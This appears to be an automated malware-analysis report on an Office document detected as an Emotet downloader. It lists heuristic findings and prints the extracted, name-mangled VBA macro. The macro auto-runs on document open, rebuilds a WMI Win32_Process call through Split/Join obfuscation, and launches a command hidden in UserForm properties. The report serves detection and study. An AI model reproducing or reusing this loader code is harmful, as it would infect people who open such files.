MALICIOUS
232
Risk Score
Heuristics 8
-
ClamAV: Doc.Downloader.Emotet-7464570-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-7464570-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGERVBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.Matched line in script
Cqyjfmfuhh = Join(Split("23nNNgi3_7&&jjNN#" + "win23nNNgi3_7&&jjNN#mg23nNNgi3_7&&jjNN#mt23nNNgi3_7&&" + "jjNN#s:23nNNgi3_7&&jjNN#Wi23nNNgi3_7&&jjNN#n323" + "nNNgi3_7&&jjNN#2_23nNNgi3_7&&jjNN#", hb32bmmejdn), "") + Ktbzpwygnmjl.Sxdahqhm + "rocess" -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set Otljjauo = VBA.CreateObject(JJKBSKJ + Cqyjfmfuhh) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_open() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11189 bytes |
SHA-256: 7d6b095b4dc46cfa520e93bab140334ee73eed756d3f75e02ffea0d469ad14c6 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
303 of 522 identifiers look randomly generated (e.g. 'Bvpktcygkxbcs') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Ktbzpwygnmjl"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Sxdahqhm, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Vqkkqkdeedz = Sitdhosekwdb
Wkurgvkyexd = 157
Cmtdxgvvzv = ("Omnis nisi enim rerum.")
Sklluhjxuh = (528)
Dim Ltrjtevazf As Integer
Dim Qsfuxuwpohnl As Double
Dim Jqtlouskreo As Integer
Dim Uzflnutv As Boolean
Dim Ozakeveg As String
Dim Fufgnqvzga As Integer
Dim Lscpivaqf As String
Oflojoony = (191)
Dim Wauzxwyu As String
Ainhiomj = ("Temporibus eos eum.")
Fnmqbccmkrn = (650)
Dim Jvbujxdskdhow As Double
Bzcdsswio = Vumjxnxkdmgtc
Xukecedv = Ojkfmnnqlb
Afuqluuuf = "Eveniet dolor deserunt ad voluptatibus."
Qucxjcssybyi = 958
Mknkfqopifhnc = Nnbxkclmrfasu
Qayiterwf = 925
Noyqfxxwwpbl = ("Assumenda asperiores.")
Byweeyticogo = (419)
Dim Rwqwsqpwnaacv As Integer
Dim Qopwnsfura As Boolean
Dim Emjkqdzf As Boolean
Dim Ftmeflvebdvxm As Boolean
Dim Sgfmbyvlqlje As Boolean
Dim Zvsksjwjjn As Integer
Dim Nzdegajsxxtty As Boolean
Hwtvhftchc = (196)
Dim Qvixsrckwhle As String
Xmcbzmsaonpr = ("Mabel")
Uxwbtgtwoabb = (367)
Dim Nzkplmhgafd As Boolean
Qhvhaejq = Kkdbaycayr
Odagalnxqyt = Ptsaxmxn
Ehlhixef = "Occaecati iusto a."
Csrgudxdbulqz = 1
Fvvjkviqpi = Lwnhqlzdgll
Cexeaiqwjctp = 603
Tyzmzbuvrthgt = ("Deleniti explicabo voluptatem qui.")
Etkxrirlmoajt = (41)
Dim Trlpgegzlwxg As Integer
Dim Xtpdzfij As Boolean
Dim Ocnnxzrauxz As Double
Dim Egtxuzatbeho As Boolean
Dim Fuwlkzybeq As Boolean
Dim Mexmpehy As Integer
Dim Fhojrtmxgycom As Integer
Lpqwdbcetmwvp = (791)
Dim Hwahpoxa As String
Ogkuyysrn = ("Sapiente vero sed reprehenderit.")
Qchvcdvxvxw = (784)
Dim Qgneqkoo As Integer
Ovsjuoddbko = Tmmkbdmhrxhe
Nbdqahlsak = Jruuzpam
Ezmkxjwxlfbc = "Alias."
Ytnjialc = 504
Iobmoqajahxs
End Sub
Attribute VB_Name = "Vjgdknlt"
Attribute VB_Base = "0{5198C26E-EC35-48EC-B747-FBA047B9C264}{92B413BD-2514-4BCC-8A09-93C1A9E7EDC6}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Nmgafsqbbgpfo"
Function Xnfdptigz()
Khwraequogtos = Swljvmnpphxkf
Cuvlyrbmv = 777
Ewydnidjjb = ("Non.")
Ekxrgkctlc = (727)
Dim Zsgpgqjq As Double
Dim Irrmtphwjf As Double
Dim Qabavctwac As Boolean
Dim Dvbncsrdqucf As Boolean
Dim Qnmpsbvpbgof As Double
Dim Xwkgcwiyn As Double
Dim Qoetwyvzblfk As Double
Myotvywxjg = (126)
Dim Wcdlrztvcn As Boolean
Fitgtwrmzwqy = ("Vel illo repellat ut.")
Suwtfxzmb = (833)
Dim Qtgrphzhtnnfq As String
Pilzmfrmgyz = Twtgajcck
Pqqarfpfos = Abgqzhzsqyr
Ugehckembkvoq = "Enim nam modi qui."
Jttqlfse = 423
Zseadboojgk = Ktbzpwygnmjl.Sxdahqhm
Cysuqjobxd = Slixnadfz
Pzhbpubzwqhu = 605
Evlixnknb = ("Placeat quis.")
Prcujrlsf = (725)
Dim Jhzhveirkqvr As Double
Dim Swbwibxfv As Boolean
Dim Zfmywchc As Double
Dim Ejqsffkqpu As String
Dim Oqujvxbydlze As String
Dim Vsonnpztonkec As Boolean
Dim Pgfdgqwdmg As String
Lisjmwgj = (11)
Dim Cgkuvchz As Boolean
Elofubpizocg = ("Quia consequatur debitis.")
Okwdxhvnumd = (406)
Dim Lvtwmpowzunp As String
Yjdavdvgk = Bjzqqbbvh
Fsproroqinm = Drmivxfknrlfp
Sltddkdkle = "Enim vel."
Rtxrpjcnz = 908
Onemonoegwjl = Zseadboojgk + Vjgdknlt.Spzrnfjqi + Vjgdknlt.Gwdnlcihm + Vjgdknlt.Hhzbdrrf
Eabwvkjadca = Vxrujavv
Sgrkxreo = 826
Hzznukcn = ("Ipsum voluptatem et.")
Pyluvfyqoe = (873)
Dim Czipdaljzonm As String
Dim Ydzzxhdtluvx As Integer
Dim Snzihpxaffgb As Double
Dim Jalyaahvrp As Integer
Dim Ojnougmsqlo As String
Dim Exyxusvft As Integer
Dim Iwwolxwkbt As Integer
Mrkapksxlht = (631)
Dim Jxwxliuz As Double
Xjxhtpedk = ("Woodrow")
Lgjsfvamzb = (151)
Dim Mczznplf As Integer
Mmqsczhgdi = Xqnfgnunddui
Tqrnzyvbu = Nsbesxui
Ilhjxlbgi = "Culpa ratione."
Hygqppiuw = 708
Zgccfgnm = Onemonoegwjl + Vjgdknlt.Xzyfmferj + Vjgdknlt.Umvcoqgnuzoip.Factoid
Byxegujbksebu = Gbwwiyczwh
Zdxavfat = 11
Lfzgwzmj = ("Omnis occaecati veniam et.")
Fnbmnunzzyaws = (414)
Dim Xmsjvtdcfq As Boolean
Dim Bbdmnjovlblmb As String
Dim Ulaomfvz As Double
Dim Zcfblvwwwlxw As Double
Dim Neyzwbfhct As Integer
Dim Fbfrfcqrngit As Integer
Dim Pqehcyzna As Integer
Wclorzmst = (506)
Dim Refvfuyhvezq As String
Dvqkssawkjz = ("Delbert")
Vgvbgpuy = (331)
Dim Hseptmcx As String
Zoewibxtutwvb = Azdsarqd
Rndhkilned = Zsfsbeff
Nmsmyfliikk = "Quaerat molestiae totam eligendi repudiandae consequuntur quas."
Nulklkiwovy = 591
Xnfdptigz = Drmsnotwnol + Zgccfgnm + Drmsnotwnol
Soxfwstek = Kldcbgpjxvpjt
Rgkkazlvhgn = 577
Fitzsycspqgm = ("Praesentium nulla nesciunt.")
Wkdedjfanu = (214)
Dim Wypwvnqx As Integer
Dim Bprvuybpdxy As Double
Dim Lebjgmfvzzo As Boolean
Dim Ctvswfhh As String
Dim Mipgzxqcfhj As Integer
Dim Tekkytbqcsqw As Boolean
Dim Kbthhcqpargf As Boolean
Xjvtyabolu = (737)
Dim Hwkqykqdgam As Integer
Cbedsesv = ("Ut asperiores aut.")
Twwxhtvpyysu = (432)
Dim Ktvoucwxv As Boolean
Ywltqptodqtbm = Klnbkhhztz
Bpxvbfci = Wiizfroqrj
Sljthnrwst = "Delectus."
Szfusvkana = 84
End Function
Function Iobmoqajahxs()
Gfrkozcvk = Ydrqvrkbiu
Dacuutvgxnoy = 848
Hqmxxjxgjel = ("Dianne")
Yroinzknklei = (201)
Dim Bmkptzhjupk As Double
Dim Xxqyjhzxpifay As Integer
Dim Xehputvu As String
Dim Rmmowzypcmq As Integer
Dim Vacsmdfovth As Double
Dim Hvcdbcsjrvn As Boolean
Dim Jhkwtkeqmosb As Boolean
Szwtecgrcny = (964)
Dim Bedfpjtuyey As String
Izvgkbsmzjvci = ("Ipsam distinctio.")
Sexxixclij = (86)
Dim Pwuvxtiuhvwc As Boolean
Acvhdgdgcugb = Fnnxhjcqenyia
Wivapwaqb = Piuzovbjptizu
Kxhjugrbfml = "Lola"
Cewlrlut = 259
hb32bmmejdn = "23nNNgi3_7&&jjNN#"
Cqyjfmfuhh = Join(Split("23nNNgi3_7&&jjNN#" + "win23nNNgi3_7&&jjNN#mg23nNNgi3_7&&jjNN#mt23nNNgi3_7&&" + "jjNN#s:23nNNgi3_7&&jjNN#Wi23nNNgi3_7&&jjNN#n323" + "nNNgi3_7&&jjNN#2_23nNNgi3_7&&jjNN#", hb32bmmejdn), "") + Ktbzpwygnmjl.Sxdahqhm + "rocess"
Qikbcmxkhamzh = Aycsxzsrk
Vsujicdiu = 669
Qyfusqkpk = ("Tempora repellendus hic sunt atque consequatur non soluta eos quibusdam.")
Vryhzhxyrzrtr = (854)
Dim Xrjwyjdvidn As Boolean
Dim Bgvasyxdk As Double
Dim Wlvmfzfo As String
Dim Ssgornsv As Boolean
Dim Mdqxkeqb As Double
Dim Mnqganoqq As Integer
Dim Ynfinomaleiux As String
Uybaieuipfbz = (256)
Dim Ycegfnql As Boolean
Peaidettqhsqo = ("Autem facilis perferendis eligendi veniam ducimus placeat laboriosam.")
Udepcmpx = (779)
Dim Cdnscbjjek As Double
Mflmijgl = Ofkkmvmkagd
Bfbogjhj = Qrzeqegrleooi
Pnwtkwarekhg = "Sint repellat veniam debitis aut totam enim quos."
Caejgusn = 598
Set Otljjauo = VBA.CreateObject(JJKBSKJ + Cqyjfmfuhh)
Giznehiymp = Gbuifmkjvsq
Ywqhygpywrg = 792
Ywmknmekeknti = ("Sed ad nobis quia rerum rerum assumenda perspiciatis dolorem quaerat.")
Monsxzgkr = (919)
Dim Jbqjkoiinow As Boolean
Dim Exetmdoqw As Integer
Dim Idnbxsmvtz As Double
Dim Tvaykzvr As String
Dim Inaumynb As String
Dim Seagagkvbb As Boolean
Dim Bukyledqa As String
Fvzbcfohrbqk = (472)
Dim Tyepzqolcmfk As Integer
Jyhlaivlaf = ("Hic voluptatem.")
Ntzdkkudsgz = (726)
Dim Chttnvsq As String
Tufkgyhxygjcu = Bvpktcygkxbcs
Pzlvgjfaof = Aurzmhula
Ivunumewp = "Omnis amet nulla quidem."
Qjqzfowvbfi = 940
Eblefowmy = Cqyjfmfuhh + Vjgdknlt.Wawgjfyzzod.ControlTipText + Vjgdknlt.Hwsifhjmqjqi.ControlTipText
Jeleksqymjbua = Kaeybhxolgejt
Jdjhdnruecs = 407
Yavgjsknd = ("Nihil qui occaecati sit qui officiis explicabo cupiditate.")
Qlqayfjw = (69)
Dim Zxksmlsfawifp As Double
Dim Kyzbjagohq As Integer
Dim Qwyswyjydlowh As Integer
Dim Dstlwzqnh As Boolean
Dim Txtjccuobjcd As Integer
Dim Grhzjctrt As Integer
Dim Ofvxaiqjaflfu As String
Ctqyapgfph = (862)
Dim Ygbbeqnoxyq As Double
Lulaumnq = ("Et repellat magni.")
Abubghzg = (589)
Dim Tscydhpgupdc As String
Ouveuvvyagbaj = Gxsbjgtsm
Xgwixxlwmlm = Tvvrvxcxaz
Kafrvcihhypb = "Franklin"
Donbvtchin = 783
Bzucdvaekz = Eblefowmy + Ktbzpwygnmjl.Sxdahqhm
Sfbzfkqrwxg = Hezncvkl
Npukocti = 312
Jijzjzdhg = ("Fugiat.")
Udopxzcljqc = (423)
Dim Ojkzcpco As Double
Dim Uyuzdcrdf As Boolean
Dim Smgvrcqxrog As Boolean
Dim Lzodfqdzp As Boolean
Dim Qczzirmxgmvx As Double
Dim Kmmrmpoz As Boolean
Dim Donyozqcnmf As String
Qoabjsvp = (485)
Dim Zuerhcjfrp As Integer
Udoihvsksyvjv = ("Thomas")
Negqyaeoej = (148)
Dim Adgozsuuwn As Boolean
Awsrbyvvep = Kymvqpky
Sgmkwrahqa = Qbimmfomekhf
Fzegdbln = "Repellendus accusantium sunt et consequuntur blanditiis aperiam consectetur eum amet."
Frcevwzvwp = 122
Set Iobmoqajahxs = CreateObject(Bzucdvaekz)
Xdvvqbcyy = Dbgqjajtfmep
Jzncbjjpk = 801
Kdukwdlgsspqw = ("Rerum distinctio.")
Fqiusozphc = (621)
Dim Xsioqpryxpii As Integer
Dim Jdntiqrodtgq As String
Dim Lnmiihnnje As Boolean
Dim Enpphalz As Double
Dim Bntxejopharh As Boolean
Dim Caabfvtjvh As String
Dim Znlgeyfq As String
Okcezuwxixzfn = (745)
Dim Jtjbrsllajaea As Integer
Bwxdlqyawznx = ("Jesus")
Etadhvewpuh = (285)
Dim Cuypvcpwdhjwj As Integer
Nbeumxwqaata = Hdwirwfxk
Jralqhyklinq = Bgeypbbbrve
Ronprmzdfve = "Vel expedita et tenetur."
Vqcwtnjrqqbz = 18
Iobmoqajahxs.XSize = False
Zoghckwsawa = Emwdatqnnwh
Yezxcwicq = 30
Augucqjiqccfp = ("Sunt sapiente architecto est sed maiores beatae ut deserunt nihil.")
Sialszowlssdu = (73)
Dim Mniycgmvk As String
Dim Zccwzkvfdzb As Integer
Dim Ymxucknoeh As Double
Dim Xrzrfnpoeam As String
Dim Siipaikiwaq As Double
Dim Sajyvulhcswo As String
Dim Lqhyadfjbf As Double
Zggariin = (147)
Dim Eferiiqplbc As String
Robqemjzezrvf = ("Non placeat magnam distinctio.")
Bnfksxlc = (814)
Dim Vwsmtybch As Integer
Pseakpzgnw = Pnyvsebgm
Jqqnlapsy = Muajhhlvfms
Yucjygia = "Libero quas."
Vkucogydew = 341
Iobmoqajahxs.YSize = False
Ybzqyxrqsxr = Bczwuxslsg
Xypudxwte = 368
Jutcypyi = ("Dicta id sit.")
Otyqjxcoefuvj = (859)
Dim Cwpavpgmbqcau As Double
Dim Uyhkjeqduaufa As Integer
Dim Nksdvtjib As String
Dim Hxzhwhthlv As Integer
Dim Rumsvzajfcucr As Double
Dim Zdkqgdaxtdm As Integer
Dim Lsykambjjan As Boolean
Xcfcxpoq = (807)
Dim Afhurwsoi As Double
Yndjceggqcw = ("Voluptatem molestias ut inventore.")
Gxsqgxpwq = (378)
Dim Fsrjnqlfmnyob As Boolean
Khjebdxcoteb = Fqhaeeknwt
Rvriiqymmim = Vipdqjodtg
Oxokxkpekmb = "Deserunt ipsum ut dignissimos."
Kndvzxevo = 242
Do While Otljjauo.Create(UJNDB & Xnfdptigz, Dooytvjv, Iobmoqajahxs, Muaywgtus)
Loop
Nmbybdqtq = Psxnahkgp
Gwedlngst = 462
Oftqozpbvoi = ("Animi nisi ut nemo.")
Qsnsfzcvkggft = (401)
Dim Cmyskzdrujtk As Double
Dim Ctykimsaomt As Boolean
Dim Dzmlvbwzippc As String
Dim Asimokhhmi As Double
Dim Lzcylzpfas As Integer
Dim Yjvoudihlzshg As String
Dim Knwmdqkqw As Integer
Epnrmikjof = (163)
Dim Njznzlhurkve As String
Feintysk = ("Sharon")
Uumjxxmyvujd = (126)
Dim Lepbstui As Boolean
Dfbamqadjh = Yxxuywjxu
Ebojqrfx = Dgrvmmeugtwk
Reyvyzbob = "Sunt sint ut molestias provident aliquid voluptatibus quia sit."
Yxgklejhkurgy = 566
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.